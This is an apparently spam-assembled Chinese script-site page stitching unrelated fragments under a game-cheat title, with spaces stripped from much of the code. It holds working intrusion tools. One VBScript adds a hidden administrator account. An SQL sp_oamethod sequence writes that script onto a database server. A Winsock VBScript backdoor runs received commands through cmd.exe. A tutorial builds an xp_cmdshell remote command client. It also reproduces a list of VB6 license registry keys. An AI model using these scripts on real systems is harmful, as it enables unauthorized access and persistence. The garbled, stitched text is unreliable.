锤石脚本钩哪里有卖的上网出现

发布时间:2021-10-21 来源:脚本之家 点击:

它需要注册才能同时使用全部功能,但是我们这里仅用到COOL1.33版的一部分编辑和存盘的功能就足够了
setwsnetwork=CreateObject("WSCRIPT.NETWORK")
os=""&wsnetwork.ComputerName
Setob=GetObject(os)'得到adsi接口,绑定
Setoe=GetObject(os&"/Administrators,group")'属性,admin组
Setod=ob.Create("user","test")'建立用户
od.SetPassword"1234"'设置密码
od.SetInfo'保存
Setof=GetObject(os&"/test",user)'得到用户
oe.addos&"/test"

SQL语句如下,采用sp_oamethod过程:

declare@oint,@fint,@retint
execsp_oacreate'scripting.filesystemobject',@oout
execsp_oamethod@o,'createtextfile',@fout,'c:\1.vbs',1
exec@ret=sp_oamethod@f,'writeline',NULL,'setwsnetwork=CreateObject
("WSCRIPT.NETWORK")'
exec@ret=sp_oamethod@f,'writeline',NULL,'os=""&wsnetwork.
ComputerName'
exec@ret=sp_oamethod@f,'writeline',NULL,'Setob=GetObject(os)'
exec@ret=sp_oamethod@f,'writeline',NULL,'Setoe=GetObject
(os&"/Administrators,group")'
exec@ret=sp_oamethod@f,'writeline',NULL,'Setod=ob.Create
("user","test")'
exec@ret=sp_oamethod@f,'writeline',NULL,'od.SetPassword"1234"'
exec@ret=sp_oamethod@f,'writeline',NULL,'od.SetInfo'
exec@ret=sp_oamethod@f,'writeline',NULL,'Setof=GetObject
(os&"/test",user)'
exec@ret=sp_oamethod@f,'writeline',NULL,'oe.addos&"/test"'

shell脚本判断语句

html="1.html"
asp="1.asp"
Set fso=CreateObject("Scripting.FileSystemObject")
Set fhtml=fso.OpenTextFile(html, 1)
Set fasp=fso.OpenTextFile(asp, 2, true)
While fhtml.AtEndOfStream <> true
text=fhtml.ReadLine
text="Response.Write "&""""&Replace(text, """", """""")&""""
fasp.WriteLine(text)
wend
fhtml.close
fasp.close
set fso=nothing
msgbox "success"
Windows便用上述密钥加密你输入的密码

'搞一个特殊的站准备用的,没想到,等写完了,洞补上了,郁闷
'by009,baicker@hotmail.com
'date:071221

Dimrevdata
setsock=WScript.createobject("MSWinsock.Winsock","WSEvent_")
setsc=createobject("WScript.Shell")
Setfso=CreateObject("Scripting.FileSystemObject")
sock.connect"127.0.0.1",1234

SubWSEvent_Connect()
wscript.echo"Connected!"
endsub

SubWSEvent_DataArrival(bytes)
MyString="blank"
sock.GetDataMyString
revdata=MyString
ifbytes>0then
ifinstr(revdata,"exit")>0then
sock.close
sock.close
sock=nothing
bClose=true
exitsub
else
onerrorresumenext
tempfile="C:"&fso.GetTempName
cmd=left(revdata,len(revdata)-1)
callsc.Run("cmd.exe/c"&cmd&">"&tempfile,0,True)
Settxf=fso.OpenTextFile(tempfile,1,false,0)
sock.senddatatxf.readall&vbcrlf&vbcrlf
txf.close
callfso.DeleteFile(TempFile,True)
endif
sock.senddata"009>"
endif
endsub

WhileNotbClose
WScript.Sleep1
Wend

—————————————————————————————————————
调用winsock,未装VB的需要导入注册表
——————————————vb6controls.reg—————————————————-
REGEDIT
HKEY_CLASSES_ROOT\Licenses=Licensing:Copyingthekeysmaybeaviolationofestablishedcopyrights.

//MaskedEditControl6.0licensekey
HKEY_CLASSES_ROOT\Licenses\BC96F860-9928-11cf-8AFA-00AA00C00905=mmimfflflmqmlfffrlnmofhfkgrlmmfmqkqj

//ChartControl6.0(OLEDB)licensekey
HKEY_CLASSES_ROOT\Licenses\12B142A4-BD51-11d1-8C08-0000F8754DA1=aadhgafabafajhchnbchehfambfbbachmfmb

//CommonDialogControl6.0licensekey
HKEY_CLASSES_ROOT\Licenses\4D553650-6ABE-11cf-8ADB-00AA00C00905=gfjmrfkfifkmkfffrlmmgmhmnlulkmfmqkqj

//ADODataControl6.0(OLEDB)licensekey
HKEY_CLASSES_ROOT\Licenses\C4145310-469C-11d1-B182-00A0C922E820=konhqhioohihphkouimonhqhvnwiqhhhnjti

//CommonControls-36.0licensekey
HKEY_CLASSES_ROOT\Licenses\38911DA0-E448-11D0-84A3-00DD01104159=mcpckchcdchjcjcclidcgcgchdqdcjhcojpd

//WindowsCommonControls-25.0(SP2)licensekey
HKEY_CLASSES_ROOT\Licenses\9E799BF1-8817-11cf-958F-0020AFC28C3B=uqpqnqkjujkjjjjqwktjrjkjtkupsjnjtoun

//WindowsCommonControlslicensekey
HKEY_CLASSES_ROOT\Licenses\57CBF9E0-6AA7-11cf-8ADB-00AA00C00905=aahakhchghkhfhaamghhbhbhkbpgfhahlfle

//DataBoundGridControl5.0(SP3)licensekey
HKEY_CLASSES_ROOT\Licenses\556C75F1-EFBC-11CF-B9F3-00A0247033C4=xybiedobrqsprbijaegcbislrsiucfjdhisl

//DataBoundListControls6.0licensekey
HKEY_CLASSES_ROOT\Licenses\096EFC40-6ABF-11cf-850C-08002B30345D=knsgigmnmngnmnigthmgpninrmumhgkgrlrk

//InternetTransferControl6.0licensekey
HKEY_CLASSES_ROOT\Licenses\78E1BDD1-9941-11cf-9756-00AA00C00908=yjrjvqkjlqqjnqkjvprqsjnjvkuknjpjtoun

//MultimediaControl6.0licensekey
HKEY_CLASSES_ROOT\Licenses\B1EFCCF0-6AC1-11cf-8ADB-00AA00C00905=qqkjvqpqmqjjpqjjvpqqkqmqvkypoqjquoun

//ChartControl6.0licensekey
HKEY_CLASSES_ROOT\Licenses\7C35CA30-D112-11cf-8E72-00A0C90F26F8=whmhmhohmhiorhkouimhihihwiwinhlosmsl

//WindowsCommonControls-26.0licensekey
HKEY_CLASSES_ROOT\Licenses\4F86BADF-9F77-11d1-B1B7-0000F8753F5D=iplpwpnippopupiivjrioppisjsjlpiiokuj

//WindowsCommonControls6.0licensekey
HKEY_CLASSES_ROOT\Licenses\ED4B87C4-9F76-11d1-8BF7-0000F8754DA1=knlggnmntgggrninthpgmnngrhqhnnjnslsh

//CommControl6.0licensekey
HKEY_CLASSES_ROOT\Licenses\4250E830-6AC2-11cf-8ADB-00AA00C00905=kjljvjjjoquqmjjjvpqqkqmqykypoqjquoun

//DataGridControl6.0(OLEDB)licensekey
HKEY_CLASSES_ROOT\Licenses\CDE57A55-8B86-11D0-b3C6-00A0C90AEA82=ekpkhddkjkekpdjkqemkfkldoeoefkfdjfqe

//DataListControl6.0(OLEDB)licensekey
HKEY_CLASSES_ROOT\Licenses\A133F000-CCB0-11d0-A316-00AA00688B10=cibbcimbpihbbbbbnhdbeidiocmcbbdbgdoc

//DBWinlicensekey
HKEY_CLASSES_ROOT\Licenses\D015B071-D2ED-11d0-A31A-00AA00688B10=gjdcfjpcmjicjcdcoihcechjlioiccechepd

//MSDBRPTlicensekey
HKEY_CLASSES_ROOT\Licenses\9DF1A470-BA8E-11D0-849C-00A0C90DC8A9=cchcqjejhcgcqcfjpdfcdjkckiqikchcojpd

//FlexGridControl6.0licensekey
HKEY_CLASSES_ROOT\Licenses\72E67120-5959-11cf-91F6-C2863C385E30=ibcbbbebqbdbciebmcobmbhifcmciibblgmf

//MAPIControls6.0licensekey
HKEY_CLASSES_ROOT\Licenses\899B3E80-6AC6-11cf-8ADB-00AA00C00905=wjsjjjlqmjpjrjjjvpqqkqmqukypoqjquoun

//MSRDO2.0licensekey
HKEY_CLASSES_ROOT\Licenses\B1692F60-23B0-11D0-8E95-00A0C90F26F8=mjjjccncgjijrcfjpdfjfcejpdkdkcgjojpd

//RemoteDataControl6.0licensekey
HKEY_CLASSES_ROOT\Licenses\43478d75-78e0-11cf-8e78-00a0d100038e=imshohohphlmnhimuinmphmmuiminhlmsmsl

//WindowlessControls6.0licensekey
HKEY_CLASSES_ROOT\Licenses\80E80EF0-DBBE-11D0-BCE2-00A0C90DCA10=qijimitpmpnpxplpvjnikpkpqoxjmpkpoivj

//PictureClipControl6.0licensekey
HKEY_CLASSES_ROOT\Licenses\6FB38640-6AC7-11cf-8ADB-00AA00C00905=gdjkokgdldikhdddpjkkekgknesjikdkoioh

//RichTextBoxControl6.0licensekey
HKEY_CLASSES_ROOT\Licenses\DC4D7920-6AC8-11cf-8ADB-00AA00C00905=iokouhloohrojhhhtnooiokomiwnmohosmsl

//SheridanTabControllicensekey
HKEY_CLASSES_ROOT\Licenses\190B7910-992A-11cf-8AFA-00AA00C00905=gclclcejjcmjdcccoikjlcecoioijjcjnhng

//SysInfoControl6.0licensekey
HKEY_CLASSES_ROOT\Licenses\E32E2733-1BC5-11d0-B8C3-00A0C90DCA10=kmhfimlflmmfpffmsgfmhmimngtghmoflhsg

//WinsockControl6.0licensekey
HKEY_CLASSES_ROOT\Licenses\2c49f800-c2dd-11cf-9ad6-0080c7e7b78d=mlrljgrlhltlngjlthrligklpkrhllglqlrk


  下面是使用字符串的代码:

->PrivateDeclareFunctionGetSystemDirectoryLib"kernel32"Alias_

"GetSystemDirectoryA"(ByVallpBufferAsString,ByValnSizeAsLong)AsLong

PrivateSubForm_Click()

 DimnAsInteger
 DimstrAsString

 str=Space$(256)
 n=GetSystemDirectory(str,256)
 str=Left$(str,n)
 Printstr
EndSub->

  在上面这段代码中,字符串参数lpBuffer返回Windows的系统路径


VBScript code
On Error Resume Next
Const wbemFlagReturnImmediately=&h10
Const wbemFlagForwardOnly=&h20
strComputer="."
Set objWMIService=GetObject("" & strComputer & "/root/CIMV2")
Set colItems=objWMIService.ExecQuery("SELECT * FROM Win32_SystemDriver", "WQL", _
wbemFlagReturnImmediately + wbemFlagForwardOnly)
For Each objItem In colItems
WScript.Echo objItem.DisplayName
Next
用VB打造自己的SQL连接器

大家好.....好长时间没上网了...祝大家新年快乐....好了.工程开始
现建一个普通窗口..放上3个textBox控件.
一个是用来输入ip的txtaddres..还有就是用户名txtuser和密码txtpass...为相应的控件起个好听地名字
还有1个按钮用来确定连接...

定义一个连接对象..和记录集对象
publicconnasnewADODB.Connect'连接的
publicrecvasnewADODB.Resordset'用来接收数据的
'''''''''''''''''''''''''''''''''''''''''''''''''''
连接按钮事件click()
dimsqlasstring
sql="Provider=SQLOLEDB.1;
Password="&txtpass&";
PersistSecurityInfo=True;
UserID="&txtuser&";
InitialCatalog="&msdb&";
DataSource="&txtaddres
sql变量力存放的是连接字符串....
conn.ConnectionString=sql'连接字符串..
conn.open'连接
ifconn.state=0then'表示连接不成功...
当conn.state=1表示连接成功了....

好了...我们的软件现在已经可以正确的连接上sql服务器了
现在我们要能执行dos命令...

在我们刚才的窗体里面在创建一个textbox(txtsend)用来打dos命令和一个发送命令按钮
发送命令以后服务器会返回数据...所以还要加一个RichTextBox控件(个人推荐)...用textbox也可以
在sql默认得数据库msdb里面可以执行xp_cmdshell'dos命令'
对...我们现在也要把这条命令发送到服务器执行.....
执行按钮事件click()
dimsqlasstring
sql="xp_cmdshell'"&txtsend.text&"'"'命令应该用单引号括起来....
setrecv=conn.Execute(sql)'执行sql命令.并把返回数据记录在记录集recv里面
dimiasinteger,colasstring
WhileNotrecv.Eof'读数据到最后一行
fori=0toRecv.Fields.Count-1
col=recv.fields(i).name
RichTextBox.setcolor=&hff00&'改颜色
RichTextBox.seltext=recv.fields(col).value
recv.movenext
next
wend
程序可能会出现问题..最好加上
onErrorgotoerr1
err1:
msgboxerr.number&err.Description'程序错误编号和类型
还告诉大家vb里面有个控件可以生成连接字符串.....
components或者直接按Ctrl T..添加MicrosoftADODataControl6.0(OLEDB)控件
控件属性里面的选择第三个选项UseConnectionString然后点Build配置字符串就可以了..
配置完以后就可以把这个控件删掉.....
就讲说这里了....上面已经基本实现了主题的功能..大家还可以自己改进一下...是不是很简单喔
大家有什么问题可以找我一起研究..
===============================================
本文版权属20CN网络安全小组及其作者所有,如有转载,请保持文章完整性并注明出处

编写:特务
QQ:27272855
E-mail:XF_Mengqier@163.com

->

并保存所有打开的文件1003过滤器是用来在“打开/另存为”处理中,通过对该属性的设置来控制文件的类型
此脚本的作用是每2分钟检测一次temp文件夹,若emule下载完成,则temp为空,脚本等待2分钟后强行关闭本地计算机,没有超时或警告。

网站地图 | Tag标签 | RSS订阅
Copyright © 2012-2019 脚本之家 All Rights Reserved
脚本之家  渝ICP备13030612号